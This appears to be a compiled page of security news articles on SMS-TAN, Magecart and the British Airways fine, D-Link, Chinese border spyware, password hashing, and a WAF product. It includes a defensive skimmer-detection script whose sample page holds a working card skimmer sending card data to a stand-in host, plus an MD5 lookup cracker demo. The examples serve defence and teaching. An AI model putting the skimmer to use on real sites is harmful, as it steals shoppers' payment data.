German banks to stop using SMS to deliver second authentication/verification factor

German banks are moving away from SMS-based customer authentication and transaction verification (called mTAN or SMS-TAN), as the method is deemed to be too insecure.


According to German business news outlet Handelsblatt, a number of banks, whether private, co-operative or public, have either stopped offering the option or are planning to remove it by the end of the year. Among these are Postbank, Berliner Sparkasse, Consorsbank and others.

The reasons are mostly security and regulatory compliance

Since a lot of people do their online banking on their mobile phones, an attacker only needs to compromise that one device to obtain everything needed for a fraudulent transaction: the banking credentials and the TAN delivered to the same phone. Users can also have their online banking credentials phished and then be targeted with fake text messages purportedly coming from the bank.

It’s also becoming common for attackers to perform SIM swapping to impersonate the target’s phone and validate the fraudulent transaction. And, finally, there have been instances of criminals exploiting long-known security vulnerabilities in the SS7 protocols to bypass German banks’ two-factor authentication and drain their customers’ bank accounts.

The German Federal Office for Information Security (BSI) has been warning of the security risks of SMS-TAN for years, Handelsblatt noted, and instances of abuse of the mTAN process have become more frequent.

Also, banks and other payment services providers must get in line with the EU Payment Services Directive 2 (PSD2), which mandates that remote electronic transactions performed by EU consumers must be authorized using “strong customer authentication” (SCA).

“‘Strong customer authentication’ means an authentication based on the use of two or more elements categorised as knowledge (something only the user knows), possession (something only the user possesses) and inherence (something the user is) that are independent, in that the breach of one does not compromise the reliability of the others, and is designed in such a way as to protect the confidentiality of the authentication data,” the Directive states.

Also: “Where the payer’s payment service provider does not require strong customer authentication, the payer shall not bear any financial losses unless the payer has acted fraudulently.”

An SMS-TAN is a “possession” element (it proves control of the phone or SIM), not a knowledge element, and because the same phone is often used for both the banking session and receiving the TAN, the independence the Directive requires between elements is hard to guarantee; the European Banking Authority (EBA) does not consider it SCA-compliant.

With the mTan option gone, users will have to start using:

  • ChipTANs (TAN generator devices provided by banks)
  • Photo-TANs (a special mobile app or reader device that photographs a “barcode” on the computer screen and generates the TAN number)
  • Push-TANs (via a specialized TAN app) or
  • Digital signatures (via smart cards).

Read the Full Article here: >Help Net Security – News

Cash rules the day when Telstra outage cripples ATMs, payment systems across Australia

Australian shoppers were left high and dry for three or more hours on Thursday when ATMs and some Eftpos terminals stopped working, due to a service outage with Telstra, the country’s main telecommunication provider. 

The nation’s big four banks — Commonwealth Bank of Australia, Westpac Banking Corporation, Australia and New Zealand Banking Group and National Australia Bank — and many retailers, including Woolworths, Caltex Australia and Australia Post, were among those hit by the failure, leaving many shoppers unable to access cash or complete their payments at the checkout counter.

The outage began around 3 p.m. AEST on Thursday. Just before 6 p.m. AEST, Telstra confirmed the network was coming back. “Good news. Many of our services are starting to restore. We’re sorry if this issue has messed up your night. We’ll provide another update when we know more,” the company said in a tweet.

Still, retailers lost money during the blackout. Some restaurants had to let meals go unpaid, and some petrol stations were also left hanging when customers had no cash on them and could not withdraw any, because ATMs were down too, according to iTnews.

Just how much did retailers lose during the outage? Dominique Lamb, CEO of the National Retail Association, told the Sydney Morning Herald that in July 2018, AUS$837 million (US$585 million) was spent each day on retail purchases in the country.

“We know that basically, they were finding it very difficult to trade for the second half of that day which is ultimately going to have an impact … we’re predicting it’s going to be up to $100 million [US$70 million],” she said.

The telco is still investigating the cause of the outage but says early investigations point to “an unusually large volume of traffic” across its networks in New South Wales, according to the Herald.

Read the Full Article here: >ATM Marketplace News

British Airways Fined £183 Million Under GDPR Over 2018 Data Breach

Britain’s Information Commissioner’s Office (ICO) today hit British Airways with a record fine of £183 million for failing to protect the personal information of around half a million of its customers during last year’s security breach.

British Airways, which describes itself as “The World’s Favorite Airline,” disclosed a breach last year that exposed personal details and credit card numbers of up to 380,000 customers and lasted for more than two weeks.

At the time, the company confirmed that customers who booked flights on its official website (ba.com) and British Airways mobile app between August 21 and September 5 had had their details stolen by attackers.

The cyberattack was later attributed to the infamous Magecart threat actor, one of the most notorious groups specializing in stealing credit card details from poorly secured websites, especially online e-commerce platforms.

Magecart hackers are known for digital credit card skimmers: they secretly insert a few lines of malicious JavaScript into the checkout page of a compromised website, which captures customers’ payment details as they are typed and sends them to a server the attackers control.
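To make the skimmer pattern concrete, here is an added example (not code from the article, from British Airways or from any Magecart analysis) of an offline audit a defender can run over a checkout page’s HTML. It parses every script tag and flags two things: third-party script includes from hosts outside an allowlist or without a Subresource Integrity attribute, and inline scripts that both read payment form fields and send data to a foreign host. The hostnames, the allowlist and the sample page are constructed for the demo, and the regexes are plain-text heuristics that will miss an obfuscated skimmer.

```python
import re
from html.parser import HTMLParser
from typing import List, Optional
from urllib.parse import urlparse

# Assumptions for this demo (not from the article): the shop's own host and the
# third-party script hosts a checkout page is allowed to load. Any other host
# appearing in a script on a payment page is treated as suspicious.
FIRST_PARTY_HOST = "shop.example"
ALLOWED_SCRIPT_HOSTS = {FIRST_PARTY_HOST, "js.payment-provider.example"}

# A skimmer needs two things: read what the customer types into the payment
# form, and get it off the page. Flag inline scripts showing both signals plus
# a foreign URL. Plain-text heuristics; obfuscated skimmers need deobfuscation.
FORM_READ = re.compile(r"cardnumber|cvv|cvc|expir|querySelector\(|getElementsBy|\.value\b|FormData|submit", re.I)
EXFIL = re.compile(r"fetch\(|XMLHttpRequest|sendBeacon|new\s+Image\(|\.open\(", re.I)
ABSOLUTE_URL = re.compile(r"https?://[^\s'\"`)]+")


class ScriptCollector(HTMLParser):
    """Collects every <script> with its src, integrity flag and inline body."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts: List[dict] = []
        self._in_script = False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            a = dict(attrs)
            self.scripts.append({"src": a.get("src"), "integrity": "integrity" in a, "body": ""})
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        # HTMLParser hands <script> contents to handle_data as raw text.
        if self._in_script and self.scripts:
            self.scripts[-1]["body"] += data


def host_of(url: str) -> Optional[str]:
    """Hostname of an absolute or scheme-relative URL; None for a relative path."""
    if url.startswith("//"):
        url = "https:" + url
    return urlparse(url).hostname


def audit_checkout_page(html: str) -> List[str]:
    """One finding per script that looks like a skimmer or an unvetted third-party include."""
    parser = ScriptCollector()
    parser.feed(html)
    findings = []
    for i, s in enumerate(parser.scripts):
        if s["src"]:
            host = host_of(s["src"]) or FIRST_PARTY_HOST  # relative src is first party
            if host not in ALLOWED_SCRIPT_HOSTS:
                findings.append(f"script[{i}]: external script loaded from unapproved host {host}")
            elif host != FIRST_PARTY_HOST and not s["integrity"]:
                findings.append(f"script[{i}]: third-party script from {host} has no integrity attribute")
            continue
        body = s["body"]
        if FORM_READ.search(body) and EXFIL.search(body):
            foreign = sorted({h for h in map(host_of, ABSOLUTE_URL.findall(body))
                              if h and h not in ALLOWED_SCRIPT_HOSTS})
            if foreign:
                findings.append(f"script[{i}]: inline script reads payment fields and sends data to {foreign}")
    return findings


# Constructed sample page: one legitimate SDK with SRI, one unvetted analytics
# include, and an inline skimmer exfiltrating card data via an image beacon.
SAMPLE_CHECKOUT_HTML = """<html><body>
<form id="payment"><input name="cardnumber"><input name="cvv"><button>Pay</button></form>
<script src="/js/checkout.js"></script>
<script src="https://js.payment-provider.example/v1/sdk.js" integrity="sha384-CONSTRUCTED"></script>
<script src="https://cdn.trusted-analytics.example/a.js"></script>
<script>
document.getElementById('payment').addEventListener('submit', function () {
  var d = JSON.stringify({n: document.querySelector('[name=cardnumber]').value,
                          c: document.querySelector('[name=cvv]').value});
  (new Image()).src = 'https://stats-collector.example/i.gif?d=' + btoa(d);
});
</script>
</body></html>"""

if __name__ == "__main__":
    for finding in audit_checkout_page(SAMPLE_CHECKOUT_HTML):
        print(finding)
```

Run it over the rendered checkout page on a schedule and diff the script inventory between runs. At runtime, a Content-Security-Policy with a tight script-src and connect-src, plus integrity attributes on every third-party include, is what actually stops a beacon to a host nobody approved.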

Besides British Airways, Magecart groups have also been responsible for card breaches on sites belonging to high-profile companies like Ticketmaster and Newegg, as well as sites belonging to many smaller online merchants.

In a statement released today, the ICO said its extensive investigation found that a variety of information relating to British Airways’ customers was compromised by “poor security arrangements” at the company, including names and addresses, log-ins, payment card data and travel booking details.

“People’s personal data is just that – personal. When an organization fails to protect it from loss, damage or theft, it is more than an inconvenience,” Information Commissioner Elizabeth Denham said.

“That’s why the law is clear – when you are entrusted with personal data, you must look after it. Those that don’t will face scrutiny from my office to check they have taken appropriate steps to protect fundamental privacy rights.”

However, the ICO also said that British Airways has cooperated with its investigation and has made improvements to its security arrangements since last year’s data breach came to light.

Since the data breach happened after the EU’s General Data Protection Regulation (GDPR) took effect in May 2018, the ICO could impose a fine of £183.39 million on British Airways, equivalent to 1.5% of the company’s worldwide turnover for its 2017 financial year, which is still less than the possible maximum of 4%.

In response to the ICO announcement, British Airways, owned by IAG, said the company was “surprised and disappointed” by the ICO penalty.

“British Airways responded quickly to a criminal act to steal customers’ data,” said British Airways chairman and chief executive Alex Cruz.

“We have found no evidence of fraud/fraudulent activity on accounts linked to the theft. We apologize to our customers for any inconvenience this event caused.”

The company has 28 days to appeal the penalty.

Until now, the most significant penalty by the UK’s data protection watchdog was £500,000, imposed on Facebook last year for allowing political consultancy firm Cambridge Analytica to improperly gather and misuse the data of 87 million users.

The same penalty of £500,000 was also imposed on credit reporting agency Equifax last year for its massive 2017 data breach, which exposed the personal and financial information of nearly 150 million people.

Since both the Facebook and Equifax incidents occurred before GDPR took effect, £500,000 was the maximum penalty the ICO could impose under the UK’s old Data Protection Act.

Read the Full Article here: >The Hacker News [ THN ]

New OWASP ZAP release adds a Heads Up Display

The OWASP Zed Attack Proxy (ZAP) project has released a new version of ZAP that includes an innovative Heads Up Display (HUD), bringing security information and functionality right into the browser.

Now software developers can interactively test the reliability and security of their applications in real time while controlling a wide variety of features designed to test the quality of their software.

ZAP is a free, easy to use integrated penetration testing tool. With the addition of the Heads Up Display, ZAP can be used by security professionals and developers of all skill levels to quickly and more easily find security vulnerabilities in their applications.

Given the unique and integrated design of the Heads Up Display, developers and functional testers who might be new to security testing will find ZAP an indispensable tool to build secure software.

In addition to being one of the most popular free and open source security tools available, ZAP is also one of the most active, with hundreds of volunteers around the globe continually improving and enhancing its features.

ZAP provides automated scanners as well as a set of tools that allows new users and security professionals to manually identify security vulnerabilities. ZAP has also been translated into over 25 languages including French, Italian, Dutch, Turkish and Chinese.

Simon Bennetts, OWASP ZAP Project Leader, commented: “This is a really important release for the project team and developers who want to build great and secure applications. The HUD is a completely new interface for ZAP, and one that is unique in the industry. It shows that open source projects continue to create high-quality, new and exciting tools that deliver real value to the market – and at no cost to users.”

“ZAP is the Foundation’s most popular software tool,” said Mike McCamon, interim executive director of the OWASP Foundation. McCamon continued, “For nearly two decades OWASP continues to be a great destination for innovators to host, develop, and release software that will secure the web. Simon and the entire ZAP community deserve great recognition for their continued devotion to open source excellence.”

Read the Full Article here: >Help Net Security – News

D-Link Agrees to 10 Years of Security Audits to Settle FTC Charges

Taiwanese networking equipment manufacturer D-Link has agreed to implement a “comprehensive software security program” in order to settle a Federal Trade Commission (FTC) lawsuit alleging that the company didn’t take adequate steps to protect its consumers from hackers.

Your wireless router is the first line of defense against potential threats on the Internet.

However, sadly, most widely used routers fail to offer the necessary security features and have often been found vulnerable to serious security flaws, enabling remote attackers to gain unauthorized access to networks and compromise the other devices connected to them.

In recent years, the security of wireless networks has become a hot topic due to cyber attacks, and has made headlines after the discovery of critical vulnerabilities, such as authentication bypass, remote code execution, hard-coded login credentials and information disclosure, in routers manufactured by various brands.

In 2017, the US Federal Trade Commission (FTC) filed a lawsuit against D-Link, one of the more popular router manufacturers, over the poor security of its wireless routers, IP cameras and other Internet-connected devices.

According to the FTC complaint, D-Link allegedly misrepresented the security of its products to its customers, didn’t adequately test its products for well-known and easy-to-fix security flaws, and also failed to secure devices when security vulnerabilities were reported by independent security researchers.

“Defendants D-Link repeatedly have failed to take reasonable software testing and remediation measures to protect their routers and IP cameras against well known and easily preventable software security flaws,” the FTC complaint says. “In truth and in fact, Defendants did not take reasonable steps to secure their products from unauthorized access.”

In 2015, D-Link also accidentally published its private code signing keys on the Internet, which could have allowed hackers to sign their malware and evade detection.

On Tuesday, the FTC published [PDF] an “amicable” settlement which requires D-Link to follow proper security planning, threat modeling, vulnerability testing and remediation before its routers and IP cameras hit the market.

The deal also makes it mandatory for the company to monitor its products for security flaws, automatically update firmware, and set up a system to accept vulnerability reports from security researchers.

Besides this, D-Link has also agreed to have its software security program audited every other year for the next 10 years by an independent third-party assessor approved by the FTC.

In a press release, D-Link claims the FTC has not found the company liable for any alleged violations, although, as noted above, the company has nonetheless reached an amicable resolution with the FTC.

The FTC settled similar charges with ASUS over the security of its routers in 2016, when the company agreed to undergo independent security audits every two years for the next 20 years.

Read the Full Article here: >The Hacker News [ THN ]

China’s Border Guards Secretly Installing Spyware App on Tourists’ Phones

Chinese authorities are secretly installing surveillance apps on smartphones of foreigners at border crossings in the Xinjiang region who are entering from neighboring Kyrgyzstan, an international investigation revealed.

Xinjiang (XUAR) is an autonomous territory and home to many Muslim ethnic minority groups where China is known to be conducting massive surveillance operations, especially on the activities of Uighurs, a Muslim Turkic minority group of about 8 million people.

The Chinese government has blamed the Muslim Turkic minority group for Islamic extremism and deadly attacks on Chinese targets.

According to a joint investigation by the New York Times, the Guardian, Süddeutsche Zeitung and others, the surveillance app is designed to extract emails, texts, calendar entries, call records and contacts, and uploads them to a local server set up at the checkpoint.

This suggests that the spyware app has not been designed to continuously and remotely track people while in China. In fact, in the majority of cases, the report says the surveillance app is uninstalled before the phone is returned to its owner.

The spyware, called Feng Cai (蜂采) or BXAQ, also scans infected Android devices for over 73,000 pre-defined files related to Islamic extremist groups, including ISIS recruitment fliers, bomb-making instructions and images of executions.

Besides this, it also looks for segments from the Quran, portions of an Arabic dictionary and information on the Dalai Lama, and for some bizarre reason, the list also includes a song from a Japanese grindcore band called Unholy Grace.

The app can be installed directly on Android phones; for tourists, journalists and other foreigners using Apple devices, the border guards reportedly connect the phones to a hardware device that is believed to install similar spyware.

According to researchers at German cybersecurity firm Cure53, who analyzed [PDF] a sample of the surveillance app, names that appear in Feng Cai’s source code suggest the app was developed by a unit of FiberHome, a Chinese telecom manufacturer that is partly owned by the government.

“The app is very simple in terms of its user interface, with just three available functions: Scan, Upload, and Uninstall,” the researchers said.

However, it remains unclear how long the collected information on travelers is stored on the Chinese server, or how the government uses it.

“The Chinese government, both in law and practice, often conflates peaceful religious activities with terrorism,” Maya Wang, a China researcher at Human Rights Watch, told the New York Times. “You can see in Xinjiang, privacy is a gateway right: Once you lose your right to privacy, you’re going to be afraid of practicing your religion, speaking what’s on your mind or even thinking your thoughts.”

It’s not the first time Chinese authorities have been caught using spyware to keep tabs on people in the Xinjiang region; intensive surveillance is very common there. However, it is the first time tourists are believed to have been the primary target.

In 2017, Chinese authorities also forced Xinjiang residents to install a similar spyware app, called Jingwang, on their mobile devices, ostensibly to prevent them from accessing terrorist information.

Read the Full Article here: >The Hacker News [ THN ]

The art and science of password hashing

The recent Flipboard breach shines a spotlight again on password security and the need for organizations to be more vigilant. Password storage is a critical area where companies must take steps to ensure they don’t leave themselves and their customer data vulnerable.

Storing passwords in plaintext is recognized as a major cybersecurity blunder. Despite this, many companies, including Facebook and Google, have committed this faux pas. When attackers gain access to a plaintext password database, they gain access to every user account in that system, and, because people reuse passwords, the breach often cascades to accounts at other organizations.

Why password hashing is essential

Password hashing, in which companies store a one-way transformation of each password rather than the password itself, has long been touted as the answer to this problem. Hashing is a one-way cryptographic transformation that turns the password into another fixed-length string, called the hashed password.

When a user chooses a new password, the password is passed through a chosen hash algorithm that performs a mathematical transformation on it, creating a hash value. This hash value is typically represented in hexadecimal format.

This hash is the only thing that is stored for the user’s password. Since the hash algorithm only works in one direction, it’s infeasible to back out the original password using just the hash value (there are other ways to deduce the original password from the hash, but more on that in a minute).

The general idea is that storing hashes rather than plaintext passwords significantly reduces the possibility that a hacker could retrieve all of the passwords in the system, even if they gain access to the database.

Later when the user logs in and we must verify that the user entered the correct password, the same process is performed again: the entered password is hashed using the same algorithm and the hash is compared to the stored one. If they match, the user is allowed access.

It’s critical to understand the different approaches to password hashing as all hashing algorithms are not created equal.

Hashing 101

Hashing algorithms take an input of any length and return an output of fixed length. This output looks nothing like the original password. While it may seem like the algorithm is pumping out a random number, it is actually a deterministic process: the same input always produces the same output. Attackers cannot directly turn a hashed value back into the password, but they can recover it by hashing candidate passwords until one produces a matching hash. This is referred to as a brute-force (or dictionary) attack.

Because hashing is deterministic, an attacker does not even need to compute anything at crack time for common passwords: precomputed lookup tables (and their compressed cousins, rainbow tables) already map passwords such as “Password1” or “qwerty” to their hashes. Without any additional protection, every user who picked “qwerty” has the identical hash in the database, so one lookup breaks all of them at once. This is where salting comes in.

To protect passwords further, a random value called a salt, unique to each user, is combined with the password before hashing and stored alongside the resulting hash. The same password then produces a completely different hash for every user, so precomputed tables are useless and each account has to be attacked separately.

Hashing algorithms

SHA-256 – With cryptographic hash functions, similar inputs produce vastly different outputs: changing a single character of the input yields an entirely different SHA-256 digest, which makes it infeasible to work backwards from the output to the input. SHA-256 is, for example, the hash function used by Bitcoin. Note, however, that SHA-256 is designed to be fast, so on its own it shares the speed problem described below for MD5 and SHA-1; for passwords it should only be used inside a deliberately slow, salted construction such as PBKDF2.

MD5 (Message Digest Algorithm 5) – MD5 is a cryptographic hash function that always produces a 128-bit output (typically written as a 32-digit hexadecimal number) no matter the length of the input. It was one of the most widely used hash functions but is no longer recommended. MD5 is not collision resistant, meaning it is practical to produce the same hash from different inputs, which makes it a poor cryptographic hash function.

MD5’s downfall when it comes to passwords was that it was too fast and too popular. Commodity GPUs can test billions of MD5 candidates per second, so brute-force and dictionary attacks succeed quickly, and its popularity means precomputed tables exist for it: today you can find the input to the MD5 hash of a common password in seconds by Googling it. Since many businesses already use MD5, some have taken to adding a salt, producing a salted MD5 output. Salting defeats precomputed tables, but it does nothing about MD5’s speed.

MD5Crypt – MD5Crypt (md5crypt) wrapped MD5 in a salted, iterated construction to make it more resistant to brute force. However, in 2012 its author, Poul-Henning Kamp, declared it insecure because of the speed of modern hardware.

SHA-1 – SHA-1 suffers from many of the same problems as MD5: it is very fast, practical collision attacks have been demonstrated against it, and it is now considered unsafe. Faster computation means faster brute-force attacks, making SHA-1 inherently unsuitable for storing passwords.

BCrypt – Unlike SHA-1 and MD5, bcrypt is intentionally slow, and its cost factor can be raised as hardware gets faster, which limits the number of guesses an attacker can make per second. A hash function must be one-way: easy to compute from input to output, infeasible to find the input from the output (hashing is not encryption; there is no key and nothing to decrypt). A deliberately slow one-way function makes cracking expensive because every guess costs the attacker the same time and computing power it costs a legitimate login.
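The points made above about determinism, salting and deliberately slow hashing can be seen in a few lines of Python. The following is an added example, not code from the article: it builds a tiny precomputed table for unsalted MD5 and cracks a common password from it instantly, then stores the same kind of password with PBKDF2-HMAC-SHA256 from the standard library (bcrypt is not in the standard library, but PBKDF2 demonstrates the same salted, iterated, tunable-cost design) using a random per-user salt and a constant-time comparison on verification. The password list, the iteration count and the record format are assumptions made for the demo.

```python
import hashlib
import hmac
import os
import time
from typing import Callable, Optional

# Constructed "leaked" password list, standing in for the gigabyte-scale
# wordlists and precomputed tables an attacker actually uses.
COMMON_PASSWORDS = ["123456", "Password1", "qwerty", "letmein", "iloveyou"]


def md5_hex(password: str) -> str:
    """Unsalted MD5, the legacy storage scheme the article warns against."""
    return hashlib.md5(password.encode()).hexdigest()


# Precomputed lookup table: because MD5 is deterministic, every user who chose
# "qwerty" has exactly this hash, so one entry cracks all of them.
MD5_LOOKUP = {md5_hex(p): p for p in COMMON_PASSWORDS}


def crack_unsalted_md5(stored_hex: str) -> Optional[str]:
    """Instant recovery of a common password from an unsalted MD5 hash."""
    return MD5_LOOKUP.get(stored_hex)


# Assumption: iteration count chosen for this demo. In production, calibrate it
# so one hash takes on the order of 100 ms on your login servers and raise it
# over time, the same way bcrypt's cost factor is raised.
PBKDF2_ITERATIONS = 200_000


def hash_password(password: str, salt: Optional[bytes] = None,
                  iterations: int = PBKDF2_ITERATIONS) -> str:
    """Salted, deliberately slow hash (PBKDF2-HMAC-SHA256).

    A fresh 16-byte random salt is drawn per password and stored in the record,
    so identical passwords produce different records and precomputed tables are
    useless. The iteration count is stored too, so it can be raised later
    without breaking verification of existing records.
    """
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, record: str) -> bool:
    """Re-derive the hash with the stored salt and iterations; compare in constant time."""
    algorithm, iterations, salt_hex, digest_hex = record.split("$")
    if algorithm != "pbkdf2_sha256":
        raise ValueError(f"unsupported hash record: {algorithm}")
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(),
                                    bytes.fromhex(salt_hex), int(iterations))
    # hmac.compare_digest avoids leaking where the first mismatching byte is.
    return hmac.compare_digest(candidate, bytes.fromhex(digest_hex))


def guesses_per_second(hash_fn: Callable[[str], object], seconds: float = 0.5) -> float:
    """Rough single-core guess rate for hash_fn, to show why speed is the problem."""
    count, deadline = 0, time.perf_counter() + seconds
    while time.perf_counter() < deadline:
        hash_fn(f"guess{count}")
        count += 1
    return count / seconds


if __name__ == "__main__":
    leaked = md5_hex("qwerty")
    print("unsalted MD5 cracked instantly:", crack_unsalted_md5(leaked))
    record = hash_password("correct horse battery staple")
    print("stored record:", record)
    print("verify correct:", verify_password("correct horse battery staple", record))
    print("verify wrong:  ", verify_password("correct horse battery stable", record))
    fast = guesses_per_second(md5_hex)
    slow = guesses_per_second(lambda p: hash_password(p, salt=b"\x00" * 16))
    print(f"MD5: ~{fast:,.0f} guesses/s; PBKDF2 (200k iterations): ~{slow:,.0f} guesses/s")
```

The benchmark at the end makes the article’s point numerically: on one CPU core the unsalted MD5 line runs hundreds of thousands of guesses per second, while the PBKDF2 line runs a handful, and a GPU widens the MD5 figure by several orders of magnitude without helping the attacker nearly as much against the iterated hash.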

Companies must remain vigilant so that their customer data is not vulnerable. With hashing, there are many different options available; however, it’s vital to recognize that not all hashing algorithms are equal. Some can be cracked with very little time and effort, others require a lot more energy and time to crack.

Hashing is a critical component of password security, but it requires a nuanced approach to protect customer data. Organizations must ensure that their password hashing strategy utilizes robust, modern algorithms that make it almost impossible for hackers to reverse the hashing and read passwords in plain text. By taking a proactive approach companies can reduce the risk of breaches and hackers gaining access to valuable customer data.

Read the Full Article here: >Help Net Security – News

AppTrana — Website Security Solution That Actually Works

Data loss and theft continue to rise, and hardly a day goes by without a significant data breach hitting the headlines.

In January 2019 alone, 1.76 billion records were leaked, and according to IBM’s Data Breach study, the average cost of each lost or stolen record has reached about $148.

Most of these leaks are the result of malicious attacks, and exploitation of web application vulnerabilities is one of the most common attack vectors.

Application security breaches are a problem for everyone; whatever the size of your company, your web applications are exposed to attack.

Hackers breach sites for a variety of reasons: some do it for fame, some to obtain competitive information, and some purely for financial gain. Whatever the reason, the cost of a breach is always higher than the cost of protection, leading to loss of data, substantial financial losses and, most importantly, loss of customers’ trust.

If you are a small or mid-size company beginning to make your mark, such data breaches can be fatal.

What is more worrisome is that the cost and extent of data breaches are growing year on year, which points to existing solutions being ineffective.

When it comes to application security—WAF (Web Application Firewall) is one of the best-known defences.

Most existing solutions fail to protect organizations from such attacks because they take a one-size-fits-all, cookie-cutter approach: a WAF generally ships with standard out-of-the-box rules that have no understanding of the specific application’s needs.

Perils of such an approach are:

  • There is very little understanding of the application context, so vulnerabilities specific to the application that hackers can exploit are left unprotected. As the saying goes, security is only as good as the weakest link.
  • Most scanners are ineffective against single-page, JavaScript-heavy sites, and business logic vulnerabilities can only be found through pen-testing. Results imported from such scanners are therefore incomplete, and the WAF most often does not accurately reflect the real protection posture.
  • Out-of-the-box rules are good in an ideal scenario. But real-world applications are far from ideal, leading to many false positives and false negatives and making the solution ineffective.
  • Proper WAF implementation requires tuning the standard rules to application-specific needs, but this takes expertise and time that are not easy to find.

All this leads to poor website security implementations: real vulnerabilities remain unprotected, and the WAF is more often than not deployed in monitor mode for fear of false positives.

AppTrana is Indusface’s revolutionary solution, built specifically to address these shortcomings in existing cloud security solutions. AppTrana provides a completely managed, highly reliable and affordable SaaS solution for securing web applications.

With AppTrana, organizations can get:

  • Protection within minutes, with zero downtime during the transition,
  • Access to highly scalable, PCI-compliant infrastructure for web application security that scales to terabytes of data with no configuration required on the customer side,
  • The ability to detect vulnerabilities, protect them instantly through virtual patches created by experts, and get round-the-clock visibility into risk posture through the integrated AppTrana portal,
  • Round-the-clock, expert-monitored protection against sophisticated DDoS attacks, and
  • An integrated CDN, so customers are not forced to choose between speed and security.

Using AppTrana, organizations can concentrate on business without worrying about security, speed, and availability of their website.

The Approach

Indusface approaches the problem of application security differently from traditional vendors.

With AppTrana, organizations identify the vulnerabilities in their application through its automated scans and its premium scans (manual penetration testing by experts). This ensures an organization understands the risk posture of its application up front.

AppTrana’s advanced scanner works with modern JavaScript-heavy sites and is built from the ground up with WAF integration in mind, so it can learn from WAF traffic insights and feed vulnerability status back to the WAF for protection.

AppTrana enables organizations to provide immediate website protection through virtual patching with its WAF module.

For this, AppTrana provides:

  • Advance Rules – Rules written by security experts that come with a zero-false-positive guarantee.
  • Premium Rules – Complex rules for enhanced protection that may generate some false positives depending on a particular application’s design and behavior. These are applied in log mode, monitored and tuned to ensure zero false positives for the application before being put in block mode.
  • Custom Rules – Application-specific rules written by security experts on customer request, with a zero-false-positive guarantee.

With this approach, AppTrana ensures that security is tuned to meet specific application needs guaranteeing zero false positives.

Also, AppTrana provides round-the-clock monitoring and expert support to mitigate sophisticated application-layer DDoS attacks, ensuring the availability of your site.


With the tightly integrated WAF and Scanner modules, AppTrana ensures that there is constant learning, which is shared across both, improving the efficacy of detection and protection.

For example, deep learning in the WAF allows AppTrana to provide application context to the scanner, which ensures better crawling and detection.

Such integration gives AppTrana an unfair advantage that allows Indusface to provide superior protection to its customers.

Plans

You can choose any of the below-listed plans to start the AppTrana Journey.

  • Basic Plan – Free for life. Get started by identifying your site’s risk posture with AppTrana’s automated scanner.
  • Advance Plan – $99/month with a 14-day free trial. Get started with immediate protection for the vulnerabilities detected.
  • Premium Plan – $399/month for complete AppTrana protection. It comes with one premium scan every 12 months and unlimited custom rules.

Getting Started

If your organization is interested, you can sign up for AppTrana protection at apptrana.com; the entire onboarding can be done with zero downtime.

You will be asked to provide the domain you would like to protect and then to verify the configuration; you can enable the CDN at this point or later from the settings page.

Next, you will be asked to provide your SSL certificate (with its private key), which is required to decrypt https traffic and inspect it for attacks. Indusface assures that the certificate is encrypted and stored securely, and that no one in the company has direct access to customer certificates.

Alternatively, your organization can choose to use a free Let’s Encrypt certificate, in which case AppTrana generates the certificate for the domain automatically and no certificate needs to be provided.

Your organization can also choose to buy an Entrust certificate from Indusface.

That’s it: you will then be asked to make a CNAME change to divert traffic to AppTrana’s infrastructure. Onboarding is then complete and protection starts immediately.

The Journey

The customer’s journey starts from the point they make the DNS change. Once protection starts, a few things happen:

  • The site gets immediate protection with Advance Rules, which are fine-tuned to avoid false positives. DDoS protection is also enabled.
  • A request is sent to Indusface’s managed service team to monitor traffic.
  • An automated scan of the site starts to help AppTrana identify the website’s risk posture. The scan generally takes a few hours depending on the complexity of the site. Customers who want an authenticated scan can provide credentials from the settings page.
  • Once the scan is complete, customers receive a risk profile email telling them how many vulnerabilities that matter were found. Further details are available by logging in to the portal.
  • The Detect page lists all detected vulnerabilities and their protection status, from which customers can take further action such as requesting a custom rule; the request goes to Indusface’s managed service team, which creates rules specific to the site.
  • Customers can also have a manual penetration testing audit done, requested from the Detect page. Indusface’s security experts then reach out to understand the customer’s needs and perform a manual audit to find vulnerabilities that automated scanners cannot. It generally takes 3-4 weeks to complete the audit and publish the report. Once published, the vulnerabilities found appear on the Detect page and customers can request custom rules as needed.
  • Meanwhile, the managed service team monitors the traffic for 14 days and moves the site to Premium Rules after making the necessary adjustments.

Once the site has been moved to Premium Rules, manual penetration testing is done and all vulnerabilities are protected, the onboarding journey is complete and the site is fully protected.

As you can see, the entire journey is managed by the Indusface team as promised, and very little activity is expected from customers except requesting certain actions based on their needs.

Continuous Monitoring

Now the site moves to a continuous monitoring state. Rules are fine-tuned continuously by Indusface’s managed service team as needed, and additional rules are added by the Indusface team without any action required from customers.

Customers are encouraged to start automated scans at least once a month to be up to date on their Risk profile.

Even if no changes are made to the site, new signatures are added to the scanner continuously, so there is a high probability that new vulnerabilities will be found. Customers can monitor the effectiveness of rules from the Protect page.

Being a completely managed solution, the Indusface team is on standby 24x7 to help customers thwart sophisticated Layer 7 DDoS attacks as the need arises.

Conclusion

If you are an SME or MSE looking for an application security solution that works, you need look no further.

With tightly integrated scanner, WAF and CDN modules, AppTrana is one of the most effective solutions in the industry and can guarantee comprehensive protection.

The features explained here are just the tip of the iceberg. We would strongly urge you to sign up for a free trial and explore AppTrana’s capabilities firsthand.

Start with the AppTrana free trial now, and for additional information check out the whitepaper section.

Read the Full Article here: >The Hacker News [ THN ]